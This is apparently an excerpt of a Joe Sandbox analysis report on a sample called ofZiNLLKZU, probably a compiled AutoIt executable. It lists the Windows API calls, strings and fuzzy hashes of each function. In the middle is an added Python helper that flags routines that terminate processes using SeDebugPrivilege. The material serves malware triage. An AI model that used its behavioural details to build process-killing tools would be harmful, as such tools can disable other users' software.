                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00631449,?,?,00000000), ref: 00631830
                                                                                • DuplicateHandle.KERNEL32(00000000,?,00631449,?,?,00000000), ref: 00631833
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00631449,?,?,00000000), ref: 00631843
                                                                                • GetCurrentProcess.KERNEL32(00631449,00000000,?,00631449,?,?,00000000), ref: 0063184B
                                                                                • DuplicateHandle.KERNEL32(00000000,?,00631449,?,?,00000000), ref: 0063184E
                                                                                • CreateThread.KERNEL32(00000000,00000000,00631874,00000000,00000000,00000000), ref: 00631868
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: 72f453b8f28487469c631f718bad289312bc33fc8cbe9bccfed639d0a269c31f
                                                                                • Instruction ID: 3f5251d1d2d6fa9ec6c5f79e71afa8073d3befdad6d0ff869fda58354c4dce0e
                                                                                • Opcode Fuzzy Hash: 72f453b8f28487469c631f718bad289312bc33fc8cbe9bccfed639d0a269c31f
                                                                                • Instruction Fuzzy Hash: 2C01BF75240744BFE710AB66DC4DF677B6DEB8AB11F015411FA45DB191C6B19800CB70
                                                                                APIs
                                                                                  • Part of subcall function 0063D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0063D501
                                                                                  • Part of subcall function 0063D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0063D50F
                                                                                  • Part of subcall function 0063D4DC: CloseHandle.KERNEL32(00000000), ref: 0063D5DC
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065A16D
                                                                                • GetLastError.KERNEL32 ref: 0065A180
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065A1B3
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0065A268
                                                                                • GetLastError.KERNEL32(00000000), ref: 0065A273
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065A2C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 9aaaeb92580bc8c1f8feda807ca6ad5acd0d070e976b5c9d6fc5ca47e89e3f2e
                                                                                • Instruction ID: bf6c5d43c8ee21a2373118a232c190e429e819f6775f3a2a152dc8d32a002c77
                                                                                • Opcode Fuzzy Hash: 9aaaeb92580bc8c1f8feda807ca6ad5acd0d070e976b5c9d6fc5ca47e89e3f2e
                                                                                • Instruction Fuzzy Hash: 8661D2302046429FD720DF58C495F65BBE2AF44318F18858DE8568F7A3C772ED4ACB92
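The record above is the kind a triager scans these function blocks for: its API ID is the word bag of CreateToolhelp32Snapshot / Process32First / OpenProcess / TerminateProcess / CloseHandle / GetLastError, and its only string is SeDebugPrivilege, i.e. a routine that walks the process list, opens a process by name and terminates it, with SeDebugPrivilege enabled first so that OpenProcess also succeeds on processes owned by other users. The following helper is an added example, not code from Joe Sandbox or its IDA plugin: it parses records in the layout shown on this page (an optional APIs list of `• Name.MODULE(args), ref: ADDR` rows, the Similarity fields, and an `• Instruction Fuzzy Hash:` row closing every record; that layout is an assumption taken from the page), rebuilds each function's API word bag, and flags the combinations worth a closer look. The rule labels are the example's own, and the remark in the comments that the AutoIt runtime implements ProcessClose the same way is an inference from the API set, not something the report states.

```python
"""Triage helper for the per-function records in a Joe Sandbox report (the
'APIs' / 'Similarity' blocks on this page). Added example; it is not code from
Joe Sandbox or its IDA plugin. It assumes the record layout visible here: an
optional 'APIs' list of '• Name.MODULE(args), ref: ADDR' rows, 'Similarity'
fields, and a '• Instruction Fuzzy Hash:' row that closes every record."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records from this page with the indentation and the
# 'Download File' link residue stripped. Every value is the page's own; the
# first record's API list is cut off on the page, so only CloseHandle appears.
SAMPLE = """\
APIs
• CloseHandle.KERNEL32(00000000), ref: 0065A2C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Instruction Fuzzy Hash: 8661D2302046429FD720DF58C495F65BBE2AF44318F18858DE8568F7A3C772ED4ACB92
APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 005EF953
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0062F3D1
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Instruction Fuzzy Hash: 5841F931508AC0BAC73D9B2AD89877A7FA3BB56320F15543DE0C7D6562CE71A880CF51
"""

# One API row; 'Part of subcall function ...:' marks an API reached indirectly.
API_ROW = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-F]+: )?"
    r"(?P<name>[A-Za-z_][A-Za-z_0-9]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
FIELD_ROW = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")
# Joe's 'API ID' is a '$'-separated word bag built from the CamelCase pieces of
# the imports a function calls; split it back into those pieces.
WORD = re.compile(r"[A-Z][a-z0-9]*|_[A-Za-z0-9_]+|[a-z0-9]+")

# Triage rules: (label, words that must all occur in the API ID, substring that
# must occur in the String ID or None). Labels are this example's own. The
# first two fire together on the first record above: a process-list snapshot
# plus TerminateProcess, with SeDebugPrivilege enabled so OpenProcess also
# succeeds on other users' processes. The AutoIt runtime's ProcessClose is
# built the same way, which fits a compiled AutoIt script, but that attribution
# is an inference from the API set and not a statement the report makes.
RULES = [
    ("enumerate-and-terminate-process", {"Toolhelp32", "Snapshot", "Terminate"}, None),
    ("requests-SeDebugPrivilege", set(), "SeDebugPrivilege"),
    ("anti-debug-check", {"Debugger", "Present"}, None),
]


@dataclass
class Record:
    apis: list = field(default_factory=list)    # (name, module, args, ref, via_subcall)
    fields: dict = field(default_factory=dict)  # 'API ID', 'String ID', hashes, ...
    hits: list = field(default_factory=list)

    @property
    def api_words(self):
        return set(WORD.findall(self.fields.get("API ID", "")))

    @property
    def fuzzy_hash(self):
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_records(text):
    """Split the report text into Record objects, one per function."""
    records, cur = [], Record()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_ROW.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["args"] or "", m["ref"], bool(m["sub"])))
            continue
        m = FIELD_ROW.match(line)
        if m:
            key = m["key"].strip()
            cur.fields[key] = m["val"].strip()
            if key == "Instruction Fuzzy Hash":  # last row of every record
                records.append(cur)
                cur = Record()
    return records


def triage(text):
    """Parse the records and attach the labels of every rule that fires."""
    records = parse_records(text)
    for rec in records:
        strings = rec.fields.get("String ID", "")
        for label, need_words, need_string in RULES:
            if need_words <= rec.api_words and (need_string is None or need_string in strings):
                rec.hits.append(label)
    return records


def suspicious(records):
    """Records with at least one hit, most hits first. The Instruction Fuzzy
    Hash is the key for finding the same function in other reports."""
    return sorted((r for r in records if r.hits), key=lambda r: -len(r.hits))


if __name__ == "__main__":
    for rec in suspicious(triage(SAMPLE)):
        print(rec.fuzzy_hash[:16], sorted(rec.api_words), rec.hits)
```

Run it over the exported text of the whole report rather than the excerpt to get every flagged function; matching on the API word bag rather than on the API rows is deliberate, because the rows can be truncated (as in the first record here) while the API ID always carries the full set. The Instruction Fuzzy Hash of a flagged record is what to search for in other reports: the same AutoIt runtime routine will carry the same hash across unrelated samples, which separates interpreter code from the script-specific payload.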
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00663925
                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0066393A
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00663954
                                                                                • _wcslen.LIBCMT ref: 00663999
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 006639C6
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006639F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcslen
                                                                                • String ID: SysListView32
                                                                                • API String ID: 2147712094-78025650
                                                                                • Opcode ID: c46bf5a31997b954892b54f284157415ced305eb64a3966ad0169ec524b0ac6d
                                                                                • Instruction ID: 1b063f4dd4a6850800b7b32d94a1f9a5663eb7df50319cae4b11b00a2d380972
                                                                                • Opcode Fuzzy Hash: c46bf5a31997b954892b54f284157415ced305eb64a3966ad0169ec524b0ac6d
                                                                                • Instruction Fuzzy Hash: 7A419671A00219ABDF219F64CC49FEA7BAAFF48350F10052AF558E7381D7B59D80CB94
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0063BCFD
                                                                                • IsMenu.USER32(00000000), ref: 0063BD1D
                                                                                • CreatePopupMenu.USER32 ref: 0063BD53
                                                                                • GetMenuItemCount.USER32(01A3EF78), ref: 0063BDA4
                                                                                • InsertMenuItemW.USER32(01A3EF78,?,00000001,00000030), ref: 0063BDCC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 0$2
                                                                                • API String ID: 93392585-3793063076
                                                                                • Opcode ID: c6744da1632def50c51612f8b47dbc7924480e5607b454becbe692e951432f0d
                                                                                • Instruction ID: 6f515f744df3bbc0cc85951e5b893ac5acd14c2f592daf820fd542454f8a80fe
                                                                                • Opcode Fuzzy Hash: c6744da1632def50c51612f8b47dbc7924480e5607b454becbe692e951432f0d
                                                                                • Instruction Fuzzy Hash: D751AF70A002099BDF20DFA8D884BEEBBF6BF45324F146159E651E7391D7709941CBA1
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 005F2D4B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 005F2D53
                                                                                • _ValidateLocalCookies.LIBCMT ref: 005F2DE1
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 005F2E0C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 005F2E61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: &H_$csm
                                                                                • API String ID: 1170836740-4263142645
                                                                                • Opcode ID: ed42c63b08778af9c82b708a3ed9116dce9c86e1e3c3dbe731a40205c93cc977
                                                                                • Instruction ID: 9141ff5196133bf16a7e57f45c92cb4b7ba2c9bd8752fba5ac7c59d45926c66d
                                                                                • Opcode Fuzzy Hash: ed42c63b08778af9c82b708a3ed9116dce9c86e1e3c3dbe731a40205c93cc977
                                                                                • Instruction Fuzzy Hash: C841B374A0020DABCF14DF68C845ABEBFB5BF85324F148155EA14AB392D7399E02CB90
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 0063C913
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: 97cbc55fb2942a61284626a910b9c6d0ff512f61a8260dd2e12aaf215db81bce
                                                                                • Instruction ID: 0c6326e87ceac194363477dad31ebc8a6e6e1ac16b56b4573245564e4c2de26c
                                                                                • Opcode Fuzzy Hash: 97cbc55fb2942a61284626a910b9c6d0ff512f61a8260dd2e12aaf215db81bce
                                                                                • Instruction Fuzzy Hash: E6112B3268930BBAEB009B54DC82DEB7B9EDF15334F11006AF504BA2C2D7B46F4057A4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 952045576-0
                                                                                • Opcode ID: 624077caa4f46c24b695e828190bd3dd4f9832442a63aaf8a835c026755f1eba
                                                                                • Instruction ID: db8877e9271e4a09b3418a43392877701a6f4074f6bc6d7bff16a1668814fcc9
                                                                                • Opcode Fuzzy Hash: 624077caa4f46c24b695e828190bd3dd4f9832442a63aaf8a835c026755f1eba
                                                                                • Instruction Fuzzy Hash: 4C41D069C0021D75CB10EBB4888E9DFBBB9BF85700F008466E618E3161FB38E241C3E5
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 005EF953
                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0062F3D1
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0062F454
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: f029eada80fb4e1a5369ff2477d86b1ba212b01ff9a5bc5898f545380791ba17
                                                                                • Instruction ID: 1d6c52a973114ee2cc03724244e2e594f7a16fda366064af8acb072902786939
                                                                                • Opcode Fuzzy Hash: f029eada80fb4e1a5369ff2477d86b1ba212b01ff9a5bc5898f545380791ba17
                                                                                • Instruction Fuzzy Hash: 5841F931508AC0BAC73D9B2AD89877A7FA3BB56320F15543DE0C7D6562CE71A880CF51
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00662D1B
                                                                                • GetDC.USER32(00000000), ref: 00662D23
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00662D2E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00662D3A
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00662D76
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00662D87
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00665A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00662DC2
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00662DE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 96a7dbec3cdc5b53510bdab8de87a4b700476c50ba2e16f88fae0deac07df625
                                                                                • Instruction ID: 7027aa665aaafc881097522dec8ebea18e5ab7f8ccf0bdec9ea0029a54f5684d
                                                                                • Opcode Fuzzy Hash: 96a7dbec3cdc5b53510bdab8de87a4b700476c50ba2e16f88fae0deac07df625
                                                                                • Instruction Fuzzy Hash: FF316B72201A54BBEB118F50CC8AFFB3BAAEF09725F045055FE48DA291C6B59C50CBA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                • Opcode ID: 4cdaf7aa333f1d5a95103372e5773d8869a18ef190998c82a42b92b4c15ce6f1
                                                                                • Instruction ID: 88bfbd1ba3f2ef85bea777d47250ff4ee33099fd916670bc4a0081d5a0b68a1e
                                                                                • Opcode Fuzzy Hash: 4cdaf7aa333f1d5a95103372e5773d8869a18ef190998c82a42b92b4c15ce6f1
                                                                                • Instruction Fuzzy Hash: C921C5B1644E0AB7D21456209D93FFB235FAF62384F850420FE079B691F725ED11C1E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 4d5f5f9fb9c710e1066cad88a5858db0f2d3a2ebae8b910034406709526f8af1
                                                                                • Instruction ID: fc5d930ff26a4b2f75c0d0aa2d4d4deec3f46a1cab42d899609ba02c801a7a93
                                                                                • Opcode Fuzzy Hash: 4d5f5f9fb9c710e1066cad88a5858db0f2d3a2ebae8b910034406709526f8af1
                                                                                • Instruction Fuzzy Hash: 5ED1C271A0060A9FDF10CF98C895BEEB7B6BF48355F148069E916AB380E771DD49CB90
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006115CE
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00611651
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006117FB,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006116E4
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006116FB
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00611777
                                                                                • __freea.LIBCMT ref: 006117A2
                                                                                • __freea.LIBCMT ref: 006117AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 2829977744-0
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2610073882-625585964
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0064125C
                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00641284
                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006412A8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006412D8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0064135F
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006413C4
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00641430
                                                                                Similarity
                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                • String ID:
                                                                                • API String ID: 2550207440-0
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0065396B
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00653A7A
                                                                                • _wcslen.LIBCMT ref: 00653A8A
                                                                                • VariantClear.OLEAUT32(?), ref: 00653C1F
                                                                                  • Part of subcall function 00640CDF: VariantInit.OLEAUT32(00000000), ref: 00640D1F
                                                                                  • Part of subcall function 00640CDF: VariantCopy.OLEAUT32(?,?), ref: 00640D28
                                                                                  • Part of subcall function 00640CDF: VariantClear.OLEAUT32(?), ref: 00640D34
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4137639002-1221869570
                                                                                APIs
                                                                                  • Part of subcall function 0063000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?,?,0063035E), ref: 0063002B
